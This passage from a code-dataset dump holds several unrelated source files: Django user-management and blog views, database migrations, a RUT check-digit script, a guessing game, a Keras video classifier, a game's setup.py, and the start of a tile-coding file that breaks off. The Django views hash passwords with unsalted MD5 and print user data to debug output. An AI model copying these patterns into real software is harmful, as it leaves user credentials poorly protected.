old_users:\n log_inf.info(f'用户{username},登录系统成功')\n print('登录成功')\n else:\n log_inf.info(f'用户{username}登录系统失败,用户名密码错')\n result = {'code': 10102, 'error': 'The username is already existed !'}\n return JsonResponse(result)\n # token = make_token(username)\n user_id = old_users.values()[0]['id']\n grade = old_users.values()[0]['grade']\n is_active = old_users.values()[0]['is_active']\n use_unit = old_users.values()[0]['use_unit']\n response = JsonResponse({'code': 10101, 'user': {'userName': username, 'user_id': user_id, \"grade\": grade, \"is_active\": is_active, 'use_unit': use_unit}})\n response.set_cookie('username', username, max_age=7 * 24 * 3600)\n request.session['islogin'] = True\n # return JsonResponse({'code':200,'username':username, 'data':{'token':token.decode()}, 'carts_count':0})\n return response\n\n\ndef active_view(request):\n # 获取前端转发的code\n # 校验code\n # code合法 更新用户的is_active\n # 删除redis中对应的key\n code = request.GET.get('code')\n 
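# Editor note: the query-string 'code' is urlsafe-base64 text that decodes to '<random_code>_<username>' (see the split below).\n    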
if not code:\n return JsonResponse({'code': 10102, 'error': 'not code'})\n code_str = base64.urlsafe_b64decode(code.encode()).decode()\n\n random_code, username = code_str.split('_')\n\n old_code = cache.get(\"email_active_%s\" % (username))\n if not old_code:\n print('???????1')\n return JsonResponse({'code': 10103, 'error': 'The code is error'})\n\n if old_code != random_code:\n print('???????2')\n return JsonResponse({'code': 10104, 'error': 'The code is error'})\n\n try:\n print('???????3')\n user = UserProfile.objects.get(username=username, is_active=False)\n except Exception as e:\n print('active error is %s' % (e))\n return JsonResponse({'code': 10105, 'error': 'The username is error'})\n\n user.is_active = True\n user.save()\n\n cache.delete(\"email_active_%s\" % (username))\n\n return JsonResponse({'code': 200, 'data': 'OK'})\n\n\n# FBV function base view\ndef address_view(request):\n if request.method == 'GET':\n # 获取地址\n pass\n\n elif request.method == 'POST':\n # 创建地址\n pass\n\n\n# CBV class base view\n# 按需定义 要使用的method 对应的方法\n# 若接收到未定义的动作请求,视图类返回 405响应\ndef re_grade(grade):\n print(grade,'#######')\n data_info = UserProfile.objects.filter(username=grade)\n print(data_info[0].grade)\n return int(data_info[0].grade) + 1\n\n\n# 数据图表展示\nclass tubiao(View):\n def get(self,request):\n print('机器人展示get方法')\n date_str = '机器人展示get方法'\n return date_str\n\n def post(self,request):\n print('机器人展示post方法')\n date_str = '机器人展示post方法'\n return date_str\n\n\n# 获取所有用户\nclass reight(View):\n # resopnse_user = users(request)\n def get(self, request,id):\n print(request.body,id,'%%%%%%%%')\n re_data = []\n if id != 0:\n data_info = UserProfile.objects.filter(use_unit=id)\n else:\n data_info = UserProfile.objects.all()\n for i in data_info.values('id', 'username', 'use_id', 'ment', 'unit_phone', 'chu_name', 'use_iphone',\n 'use_address',\n 'use_unit', 'is_active'):\n # print(i['use_unit'])\n try:\n i['unit_id']=i['use_unit']\n i['use_unit'] = ServiceUnit.objects.get(id=i['use_unit']).unit_name\n except Exception as e:\n i['use_unit']= ''\n # print(use_unit.unit_name)\n re_data.append(i)\n re_data_info = {'data': re_data}\n print(re_data_info,\"========\")\n # log_inf.info('进入查询用户信息页面。。。')\n return JsonResponse(re_data_info)\n\n def post(self, request):\n print('注册')\n json_str = request.body\n json_obj = json.loads(json_str)['data']\n syx_name = json.loads(json_str)['name']\n print(json_obj,'+++++++')\n # {'uname': 'guoxiaonao', 'password': '123456', 'phone': '13488873110', 'email': '250919354@qq.com', 'carts': None}\n username = json_obj['u_name']\n password = json_obj['password']\n use_id = json_obj['use_id']\n ment = json_obj['ment']\n unit_phone = json_obj['unit_phone']\n chu_name = json_obj['chu_name']\n use_iphone = json_obj['use_iphone']\n use_address = json_obj['use_address']\n use_unit = json_obj['use_unit']\n grade = json_obj['grade']\n grade = re_grade(grade)\n print(username, password)\n # 检查参数\n # 检查用户名是否可用\n old_users = UserProfile.objects.filter(username=username)\n if old_users:\n print(\"检测用户名是否存在\")\n result = {'code': 10100, 'error': 'The username is already existed !'}\n log_inf.info('系统用户'+syx_name+'操作系统,用户名'+username+\"已经存在,创建失败!\")\n return JsonResponse(result)\n # 创建用户 UserProfile创建数据\n\n m = hashlib.md5()\n m.update(password.encode())\n password_m = m.hexdigest()\n try:\n user = UserProfile.objects.create(grade=grade, use_unit=use_unit, username=username, password=password_m,\n ment=ment, use_id=use_id, unit_phone=unit_phone, chu_name=chu_name,\n use_iphone=use_iphone, 
use_address=use_address)\n log_inf.info('系统用户'+syx_name+'操作系统,用户:' + str(username) + ',创建成功!')\n except Exception as e:\n print('---user create error is')\n print(e)\n result = {'code': 10101, 'error': 'The username is already existed !'}\n return JsonResponse(result)\n # 签发jwt token(一天)\n token = make_token(username)\n\n return JsonResponse({'code': 1, 'username': username, 'data': {'token': token.decode()}, 'carts_count': 0})\n\n\n# 用户编辑\nclass reight_id(View):\n def post(self, request, id):\n log_inf.info(f'{id}进入编辑')\n print('编辑')\n json_str = request.body\n json_obj = json.loads(json_str)['data']\n sys_name = json.loads(json_str)['name']\n try:\n print(id)\n in_fo = UserProfile.objects.get(id=id)\n old_username = in_fo.username\n print(in_fo.username,'::原名称')\n in_fo.username = json_obj['username']\n in_fo.use_id = json_obj['use_id']\n # in_fo.unit_phone = json_obj['unit_phone']\n in_fo.unit_phone = json_obj['unit_phone']\n in_fo.chu_name = json_obj['chu_name']\n in_fo.use_iphone = json_obj['use_iphone']\n in_fo.use_address = json_obj['use_address']\n in_fo.ment = json_obj['ment']\n print('现在:',json_obj)\n in_fo.save()\n in_fo.use_unit = ServiceUnit.objects.get(id=in_fo.use_unit).unit_name\n log_inf.info('系统用户'+sys_name+'操作系统,用户:'+old_username+'的信息变更为'+str(json_obj))\n # log_inf.info(f'变更数据{in_fo}')\n print(in_fo)\n return JsonResponse({'code': 1, 'data': {'id':id,'use_unit':in_fo.use_unit,'ment':in_fo.ment,'use_address':in_fo.use_address,'username': in_fo.username,'use_id':in_fo.use_id,'unit_phone':in_fo.unit_phone,'chu_name':in_fo.chu_name,'use_iphone':in_fo.use_iphone}})\n except Exception as e:\n log_inf.info('系统用户'+sys_name+'操作系统,用户'+old_username+\"信息修改失败!\")\n return JsonResponse({'code': 2})\n\n#用户冻结\nclass zhengchang(View):\n def get(self, request,id):\n re_data = []\n if id !=0:\n in_fo = UserProfile.objects.filter(is_active=0, use_unit=id)\n else:\n in_fo = UserProfile.objects.filter(is_active=0)\n print(request,'冻结用户get方法')\n for i in in_fo.values('id', 'username', 'use_id', 'ment', 'unit_phone', 'chu_name', 'use_iphone',\n 'use_address',\n 'use_unit', 'is_active'):\n # print(i['use_unit'])\n try:\n i['use_unit'] = ServiceUnit.objects.get(id=i['use_unit']).unit_name\n except Exception as e:\n i['use_unit'] = ''\n # print(use_unit.unit_name)\n re_data.append(i)\n re_data_info = {'data': re_data}\n print('冻结用户:',re_data_info)\n return JsonResponse(re_data_info)\n\n def post(self, request, id):\n\n data_info = request.body\n json_obj = json.loads(data_info)['data']\n sys_name = json.loads(data_info)['name']\n print(sys_name)\n # in_fo = UserProfile.objects.get(id=id)\n # json_obj1 = json.loads(data_info)['name']\n\n # print(json_obj1,'ppppppppp')\n in_fos = UserProfile.objects.filter(is_active=0)\n user_name = ''\n for i in in_fos.values('id', 'username', 'use_id', 'ment', 'unit_phone', 'chu_name', 'use_iphone',\n 'use_address',\n 'use_unit', 'is_active'):\n if i['id'] == id:\n user_name = i['username']\n json_obj = json.loads(data_info)['data']\n in_fo = UserProfile.objects.get(id=id)\n print('is_active', json_obj)\n in_fo.is_active = json_obj\n in_fo.save()\n log_inf.info('系统用户'+sys_name+'操作系统,用户:'+user_name+'状态变更为“冻结”!')\n return JsonResponse({'code': 1})\n\n\n#用户解冻\nclass thaw_unit(View):\n\n def get(self, request,id):\n print(\"用户解冻get_id:\" ,id)\n re_data = []\n if id != 0:\n in_fo = UserProfile.objects.filter(is_active=1, use_unit=id)\n else:\n in_fo = UserProfile.objects.filter(is_active=1)\n print(in_fo)\n for i in in_fo.values('id', 'username', 'use_id', 'ment', 
'unit_phone', 'chu_name', 'use_iphone',\n 'use_address',\n 'use_unit', 'is_active'):\n print('use_unit:',i['use_unit'])\n # i['use_unit'] = ServiceUnit.objects.get(id=i['use_unit']).unit_name\n # print(use_unit.unit_name)\n re_data.append(i)\n re_data_info = {'data': re_data}\n return JsonResponse(re_data_info)\n\n def post(self, request, id):\n print(\"用户解冻post_id:\",id)\n data_info = request.body\n sys_name = json.loads(data_info)['name']\n print(data_info)\n user_name = ''\n in_fos = UserProfile.objects.filter(is_active=1)\n for i in in_fos.values('id', 'username', 'use_id', 'ment', 'unit_phone', 'chu_name', 'use_iphone',\n 'use_address',\n 'use_unit', 'is_active'):\n if i['id']==id:\n user_name = i['username']\n json_obj = json.loads(data_info)['data']\n in_fo = UserProfile.objects.get(id=id)\n print('json_obj', json_obj)\n in_fo.is_active = json_obj\n in_fo.save()\n log_inf.info('系统用户'+sys_name+'操作系统,用户:' + user_name + '状态变更为“解冻”!')\n return JsonResponse({'code': 1})","repo_name":"chinahcl/yingda","sub_path":"DjangoTest/login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70300583610","text":"\"\"\"empty message\n\nRevision ID: 1312d9703e28\nRevises: 75c94d9c76df\nCreate Date: 2020-04-10 15:15:04.077650\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '1312d9703e28'\ndown_revision = '75c94d9c76df'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('gladfc',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('glad_id', sa.String(length=20), nullable=True),\n sa.Column('glad_name', sa.String(length=60), nullable=True),\n sa.Column('glad_brh', sa.String(length=100), nullable=True),\n sa.Column('tel_no', sa.String(length=20), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.add_column('employees', sa.Column('glad_id', sa.String(length=60), nullable=True))\n op.add_column('employees', sa.Column('tel_no', sa.String(length=20), nullable=True))\n op.create_index(op.f('ix_employees_glad_id'), 'employees', ['glad_id'], unique=True)\n op.create_index(op.f('ix_employees_tel_no'), 'employees', ['tel_no'], unique=False)\n op.drop_index('ix_employees_first_name', table_name='employees')\n op.drop_index('ix_employees_last_name', table_name='employees')\n op.drop_column('employees', 'first_name')\n op.drop_column('employees', 'last_name')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.add_column('employees', sa.Column('last_name', mysql.VARCHAR(length=60), nullable=True))\n op.add_column('employees', sa.Column('first_name', mysql.VARCHAR(length=60), nullable=True))\n op.create_index('ix_employees_last_name', 'employees', ['last_name'], unique=False)\n op.create_index('ix_employees_first_name', 'employees', ['first_name'], unique=False)\n op.drop_index(op.f('ix_employees_tel_no'), table_name='employees')\n op.drop_index(op.f('ix_employees_glad_id'), table_name='employees')\n op.drop_column('employees', 'tel_no')\n op.drop_column('employees', 'glad_id')\n op.drop_table('gladfc')\n # ### end Alembic commands ###\n","repo_name":"rsentra/glad-web","sub_path":"migrations/versions/1312d9703e28_.py","file_name":"1312d9703e28_.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29343716449","text":"#Cálculo del dígito verificador de un rut\nprint(\"Calculadora numero verificador del rut\")\nrut = int(input(\"Porfavor escriba el numero del rut sin puntos: \"))\n\nrut2 = str(rut)\n\nif rut <= 99999999 and rut >= 9999999:\n pri = rut2[7:8]\n pri = int(pri)\n seg = rut2[6:7]\n seg = int(seg)\n ter = rut2[5:6]\n ter = int(ter)\n cur = rut2[4:5]\n cur = int(cur)\n quin = rut2[3:4]\n quin = int(quin)\n sext = rut2 [2:3]\n sext = int (sext)\n sept = rut2 [1:2]\n sept = int(sept)\n oct = rut2 [0:1]\n oct = int(oct)\n\n pri = pri * 2\n seg = seg * 3\n ter = ter * 4\n cur = cur * 5\n quin = quin * 6\n sext = sext * 7\n sept = sept * 2\n oct = oct * 3\n\n cal = (pri + seg + ter + cur + quin + sext +sept + oct) % 11\n det = 11 - cal\n if det == 11:\n print(\"dv=0\")\n elif det == 10:\n print(\"dv=k\")\n else:\n print(\"dv=\", det)\n\nelif rut <= 9999999 and rut > 999999:\n pri = rut2[6:7]\n pri = int(pri)\n seg = rut2[5:6]\n seg = int(seg)\n ter = rut2[4:5]\n ter = int(ter)\n cur = rut2[3:4]\n cur = int(cur)\n quin = rut2 [2:3]\n quin = int (quin)\n sext = rut2 [1:2]\n sext = int(sext)\n sept = rut2 [0:1]\n sept = int(sept)\n\n pri = pri * 2\n seg = seg * 3\n ter = ter * 4\n cur = cur * 5\n quin = quin * 6\n sext = sext * 7\n sept = sept * 2\n \n\n cal = (pri + seg + ter + cur + quin + sext +sept) % 11\n det = 11 - cal\n if det == 11:\n print(\"dv=0\")\n elif det == 10:\n print(\"dv=k\")\n else:\n print(\"dv=\", det)\nelse:\n print(\"El numero introducido es invalido\")\n\n \n ","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej5/hito1_ej5_726b8f123adccedee3d0972f2f662fe4.py","file_name":"hito1_ej5_726b8f123adccedee3d0972f2f662fe4.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36034803617","text":"import random\n\ndef number_guessing():\n secret_number = random.randint(1, 20)\n attempts = 0\n\n print(\"---Welcome to the Number Guessing Game---\")\n print(\"I've picked a number between 1 and 20. GUess it!\")\n\n while True:\n guess = int(input(\"Your guess: \"))\n attempts += 1\n\n if guess == secret_number:\n print(f\"Congratulations! You guessed the number in {attempts} attempts\")\n break\n elif guess < secret_number:\n print(\"Too low. Try again.\")\n else:\n print(\"Too high. 
Try again.\")\n\nnumber_guessing()","repo_name":"Umutoni-Rita/python-code-bank","sub_path":"number_guessing.py","file_name":"number_guessing.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26687693788","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Branch',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('name', models.CharField(help_text=b'name of the branch', max_length=64)),\n ('type', models.CharField(help_text=b'type of branch: feature/hotfix/etc', max_length=25)),\n ('description', models.CharField(help_text=b'description of the branch', max_length=512)),\n ('current_version', models.IntegerField(default=0)),\n ('is_deleted', models.SmallIntegerField(default=0, help_text=b'logical deletion')),\n ('created_by', models.ForeignKey(help_text=b'branch author', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='BranchRevision',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('revision_number', models.IntegerField(default=0, help_text=b'ordinal number of revision')),\n ('is_deleted', models.SmallIntegerField(default=0, help_text=b'logical deletion')),\n ('branch_ref', models.ForeignKey(to='repository.Branch', help_text=b'references owning branch', null=True)),\n ('previous_revision_ref', models.ForeignKey(to='repository.BranchRevision', help_text=b'references previous revision of the same branch', null=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='BranchRevisionChange',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('ordinal', models.IntegerField(default=0, help_text=b'ordinal number of change in change set')),\n ('branch_revision_ref', models.ForeignKey(help_text=b'sandbox reference', to='repository.BranchRevision')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Change',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('content', models.CharField(help_text=b'change content containing the object of the change', max_length=255)),\n ('object_type', models.CharField(help_text=b'type of object being changed', max_length=25)),\n ('object_code', models.CharField(help_text=b'guid, references a concret object being changed', max_length=36)),\n ('change_type', models.IntegerField(help_text=b'defines type of a change', choices=[(0, b'ADD'), (1, b'MODIFY'), (2, b'REMOVE')])),\n ('is_ui_change', models.BooleanField(default=False, help_text=b'specifies if change is UI change of db model change')),\n ('is_deleted', models.SmallIntegerField(default=0, help_text=b'logical deletion')),\n ('made_by', models.ForeignKey(help_text=b'change author', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Project',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('name', models.CharField(help_text=b'name of the project', max_length=64)),\n ('description', models.CharField(help_text=b'description of the project', max_length=512, null=True)),\n ('is_deleted', 
models.BooleanField(default=False)),\n ('created_by', models.ForeignKey(help_text=b'project author', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Sandbox',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('status', models.SmallIntegerField(default=0, help_text=b'state of sandbox, opened or closed', choices=[(0, b'OPEN'), (1, b'CLOSED')])),\n ('is_deleted', models.SmallIntegerField(default=0, help_text=b'logical deletion')),\n ('bound_to_branch_ref', models.ForeignKey(help_text=b'references a branch for which the sandbox is used for', to='repository.Branch')),\n ('created_by', models.ForeignKey(help_text=b'account who made the sandbox and is its owner of ', to=settings.AUTH_USER_MODEL)),\n ('created_from_branch_revision_ref', models.ForeignKey(help_text=b\"references branch revision that is 'parent' to the sandbox\", to='repository.BranchRevision')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='SandboxChange',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('ordinal', models.IntegerField(default=0, help_text=b'ordinal number of change in change set')),\n ('change_ref', models.ForeignKey(help_text=b'change reference', to='repository.Change')),\n ('sandbox_ref', models.ForeignKey(help_text=b'sandbox reference', to='repository.Sandbox')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='branchrevisionchange',\n name='change_ref',\n field=models.ForeignKey(help_text=b'change reference', to='repository.Change'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='branch',\n name='parent_branch_revision',\n field=models.ForeignKey(to='repository.BranchRevision', help_text=b'represents a branch revision that is a starting point of this branch.', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='branch',\n name='project_ref',\n field=models.ForeignKey(help_text=b'project reference', to='repository.Project'),\n preserve_default=True,\n ),\n ]\n","repo_name":"smartinov/fennec","sub_path":"fennec/apps/repository/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":6535,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"1935206916","text":"import os\nimport math\nimport tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\nfrom tf_utils import input_fn_from_dataset,input_fn_frame_from_dataset,save_tf_record,prob_positive_class_from_prediction\nfrom get_data import get_videos_from_folder,get_target_from_csv\nfrom utils import save_solution\nfrom data_manage import sliding_training_data, flip, normalize_data, extend_videos\nfrom sklearn.metrics import roc_auc_score\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import KFold\nfrom tensorflow.keras.applications.vgg16 import VGG16\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\ntrain_folder = os.path.join(dir_path,\"../train/\")\ntest_folder = os.path.join(dir_path,\"../test/\")\n\ntrain_target = os.path.join(dir_path,'../train_target.csv')\nmy_solution_file = os.path.join(dir_path,'../solution.csv')\n\nx_train = get_videos_from_folder(train_folder)\ny_train = get_target_from_csv(train_target)\nx_test = get_videos_from_folder(test_folder)\n\n# Make into -1 to 1 range\nx_train = normalize_data(x_train)\nx_test = normalize_data(x_test)\n\n# Extend videos so that they are 
all the same length (216, 100, 100)\nx_train = extend_videos(x_train)\nx_test = extend_videos(x_test)\nx_train = x_train.reshape((x_train.shape[0], x_train[0].shape[0], x_train[0].shape[1], x_train[0].shape[2], 1))\nx_test = x_test.reshape((x_test.shape[0], x_test[0].shape[0], x_test[0].shape[1], x_test[0].shape[2], 1))\nprint(x_train.shape)\n\n# Split into training and validation\nnum_training = math.floor(x_train.shape[0] * 0.9)\nindices = np.random.permutation(x_train.shape[0])\ntraining_idx, validation_idx = indices[:num_training], indices[num_training:]\ntraining_x = x_train[training_idx]\nvalidation_x = x_train[validation_idx]\ntraining_y = y_train[training_idx]\nvalidation_y = y_train[validation_idx]\n\ncnn = keras.Sequential()\ncnn.add(keras.layers.InputLayer(input_shape=(100, 100, 1)))\ncnn.add(keras.layers.Conv2D(32, 3, strides=(2,2), activation=tf.nn.relu, padding='same'))\ncnn.add(keras.layers.Conv2D(64, 3, strides=(2,2), activation=tf.nn.relu, padding='same'))\ncnn.add(keras.layers.Flatten())\n\nmodel = keras.Sequential()\nmodel.add(keras.layers.TimeDistributed(cnn, input_shape=(216, 100, 100, 1)))\nmodel.add(keras.layers.LSTM(128))\nmodel.add(keras.layers.Dense(2, activation=tf.nn.softmax))\n\nmodel.compile(optimizer='adam', loss='sparse_categorical_crossentropy')\nmodel.fit(training_x, training_y, epochs=10)\n\n\n# Validate\npred = model.predict(validation_x)\nprobs_pos = [prob[1] for prob in pred]\nprobs_pos = np.asarray(probs_pos)\nroc_auc = roc_auc_score(validation_y, probs_pos)\nprint(roc_auc)\n\n# Save submission\npredictions = model.predict(x_test)\nsolution = [prob[1] for prob in predictions]\nsave_solution(my_solution_file, solution)\n\n","repo_name":"ivantishchenko/aml-projects","sub_path":"task4/jonathan/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29291530397","text":"from django.contrib.auth.models import User\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.utils import timezone\nfrom django.shortcuts import get_object_or_404\n\nfrom .models import Post\nfrom .forms import PostForm\n\n\ndef post_list(request):\n context = {\n # 'post_list': Post.objects.filter(\n # published_date__lte=timezone.now()\n # ),\n 'post_list': Post.objects.all()\n }\n return render(request, 'blog/post-list.html', context)\n\n\ndef post_detail(request, post_id):\n # try:\n # # ORM을 이용해서 id가 전달받은 post_id와 일치하는 Post��체를 post변수에 할당\n # post = Post.objects.get(id=post_id)\n # except Post.DoesNotExist as e:\n # return HttpResponse(e)\n\n post = get_object_or_404(Post, id=post_id)\n\n # 전달할 context 딕셔너리 키 'post'에 post 변수를 전달\n context = {\n 'post': post,\n }\n # blog/post-detail.html 템플릿을 render한 결과를 리턴\n return render(request, 'blog/post-detail.html', context)\n\n\ndef post_add(request):\n if request.method == 'POST':\n # 요청의 method가 POST일 경우\n # 요청받은 데이터를 출력\n data = request.POST\n # html의 name이 키값\n\n\n # PostForm에 data인자로 request.POST 데이터를 전달해준다\n form = PostForm(data=request.POST)\n # title = data['input_title']\n # content = data['input_content']\n author = User.objects.get(id=1)\n # print(request.POST)\n # ret = ','.join([title, content])\n\n # 만약 PostForm객체가 유효할 경우(전달된 데이터의 형식이 PostForm 에 정의한 형식과과 맞을 경우)\n if form.is_valid():\n title = form.cleaned_data['title']\n content = form.cleaned_data['content']\n\n # 받은 데이터를 사용해세 Post 객체를 생성\n p = Post(title=title, content=content, author=author)\n 
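# Editor note: persist the new Post so it gets an id before redirecting to post_detail.\n            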
p.save()\n\n        else:\n            return HttpResponse('Form invalid {}'.format(form.errors))\n\n        # The redirect method takes either\n        # a URL or\n        # a URL built from a urlpattern name\n        # and makes the browser navigate to that URL\n        # return redirect('post_list')\n\n        # Go to the post detail page, passing p.id as the post_id keyword argument\n        return redirect('post_detail', post_id=p.id)\n\n\n    else:\n        # Create a PostForm instance and put it in the context\n        form = PostForm()\n        context = {\n            'form': form,\n        }\n        # When the request method is not POST,\n        # render and return the template containing the post form\n        return render(request, 'blog/post-add.html', context)\n","repo_name":"pinstinct/django-girls-tutorial-class","sub_path":"django_app/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4306552096","text":"import imp\nimport os.path\nimport sys\nfrom setuptools import setup, find_packages\n\nadditional_dlls = [\n    'pygame/SDL_ttf.dll',\n    'pygame/libvorbis-0.dll',\n    'pygame/libvorbisfile-3.dll',\n    'pygame/libfreetype-6.dll',\n    'pygame/SDL_mixer.dll',\n    'pygame/libogg-0.dll',\n]\n\n\nhere = os.path.abspath(os.path.dirname(__file__))\ntrosnoth_version = imp.load_source('trosnoth.version', os.path.join(\n    here, 'trosnoth', 'version.py')).version\n\n\ndef main():\n    if 'py2exe' in sys.argv:\n        import py2exe\n\n        # Make sure py2exe knows which data files to include.\n        paths = [\n\t    'trosnoth/data',\n            'trosnoth/data/achievements',\n            'trosnoth/data/blocks',\n            'trosnoth/data/blocks/custom',\n            'trosnoth/data/config',\n            'trosnoth/data/fonts',\n            'trosnoth/data/music',\n            'trosnoth/data/sound',\n            'trosnoth/data/sprites',\n            'trosnoth/data/startupMenu',\n            'trosnoth/data/statGeneration',\n            'trosnoth/data/themes',\n            'trosnoth/data/themes/pirate',\n            'trosnoth/data/themes/pirate/blocks',\n            'trosnoth/data/themes/pirate/config',\n            'trosnoth/data/themes/pirate/fonts',\n            'trosnoth/data/themes/pirate/sprites',\n            'trosnoth/data/themes/pirate/startupMenu',\n            'trosnoth/data/web',\n        ]\n\n        data = []\n        for path in paths:\n            files = []\n            for filename in os.listdir(path):\n                if filename in ('__init__.py', '__init__.pyc'):\n                    continue\n                fn = os.path.join(path, filename)\n                if os.path.isfile(fn):\n                    files.append(fn)\n            data.append((path, files))\n\n        moreargs = {\n            'console': [\n                {'script': 'scripts/trosnoth',\n                 'icon_resources': [(1, 'wininstall/icon.ico')]\n                },\n                'scripts/trosnoth-server',\n            ],\n            'data_files': data,\n            'options': {\n                'py2exe': {\n                    'includes': 'zope.interface,pygame._view,trosnoth.bots.john,trosnoth.bots.ranger',\n                },\n            },\n        }\n    else:\n        moreargs = {}\n\n    setup(name = 'trosnoth',\n      version = trosnoth_version,\n      description = 'Trosnoth network platform game',\n      author = 'J.D. 
Bartlett et al',\n      author_email = 'josh@trosnoth.org',\n      url = 'http://www.trosnoth.org/',\n      packages=find_packages(exclude=['test']),\n\n      # Mapping says which files each package needs.\n      package_data = {\n          'trosnoth.data.blocks': ['*.block', '*.png', '*.bmp'],\n          'trosnoth.data.fonts': ['*.ttf', '*.TTF', '*.txt'],\n          'trosnoth.data.music': ['*.ogg'],\n          'trosnoth.data.sound': ['*.ogg'],\n          'trosnoth.data.sprites': ['*.png', '*.bmp'],\n          'trosnoth.data.startupMenu': ['*.png', '*.txt'],\n          'trosnoth.data.statGeneration': ['*.htm'],\n          'trosnoth.data.themes': ['pirate/info.txt',\n              'pirate/blocks/*.png', 'pirate/config/*.cfg',\n              'pirate/fonts/*', 'pirate/sprites/*',\n              'pirate/startupMenu/*'],\n          'trosnoth.data': [\n              'config/*.cfg', 'achievements/*.png', 'web/*.png',\n              'pathfinding.db'],\n          'trosnoth': ['gpl.txt']\n      },\n\n      scripts = ['scripts/trosnoth', 'scripts/trosnoth-server'],\n      long_description = 'Trosnoth is a very addictive and fun network team game.' ,\n\n      install_requires = [\n        'pygame',\n        'twisted>=15.0',\n      ],\n\n      classifiers = [\n          'Development Status :: 5 - Production/Stable',\n          'Environment :: MacOS X',\n          'Environment :: Win32 (MS Windows)',\n          'Environment :: X11 Applications',\n          'Framework :: Twisted',\n          'Intended Audience :: End Users/Desktop',\n          'License :: OSI Approved :: GNU General Public License (GPL)',\n          'Natural Language :: English',\n          'Operating System :: OS Independent',\n          'Programming Language :: Python',\n          'Programming Language :: Python :: 2',\n          'Programming Language :: Python :: 2.7',\n          'Topic :: Games/Entertainment :: Arcade',\n          'Topic :: Games/Entertainment :: Side-Scrolling/Arcade Games',\n      ],\n      **moreargs\n    ) \n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"iliescufm/pygame","sub_path":"trosnoth-1.10.0/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72417317049","text":"'''\nThis demo of a TAMER algorithm implemented with HIPPO Gym has been adapted\nfrom code provided by Calarina Muslimani of the Intelligent Robot Learning Laboratory\nTo use this code with the default setup simply rename this file to agent.py\n'''\n\nimport gym\nimport time\nimport numpy as np\nimport itertools\n\n\n#This is the code for tile coding features\nbasehash = hash\n\nclass IHT:\n    \"Structure to handle collisions\"\n    def __init__(self, sizeval):\n        self.size = sizeval                        \n        self.overfullCount = 0\n        self.dictionary = {}\n\n    def __str__(self):\n        \"Prepares a string for printing whenever this object is printed\"\n        return \"Collision table:\" + \" size:\" + str(self.size) + \" overfullCount:\" + str(self.overfullCount) + \" dictionary:\" + str(len(self.dictionary)) + \" items\"\n\n    def count (self):\n        return len(self.dictionary)\n    \n    def fullp (self):\n        return len(self.dictionary) >= self.size\n    \n    def getindex (self, obj, readonly=False):\n        d = self.dictionary\n        if obj in d: return d[obj]\n        elif readonly: return None\n        size = self.size\n        count = self.count()\n        if count >= size:\n            if self.overfullCount==0: print('IHT full, starting to allow collisions')\n            self.overfullCount += 1\n            return basehash(obj) % self.size\n        else:\n            d[obj] = count\n            return count\n\ndef hashcoords(coordinates, m, readonly=False):\n    if type(m)==IHT: return 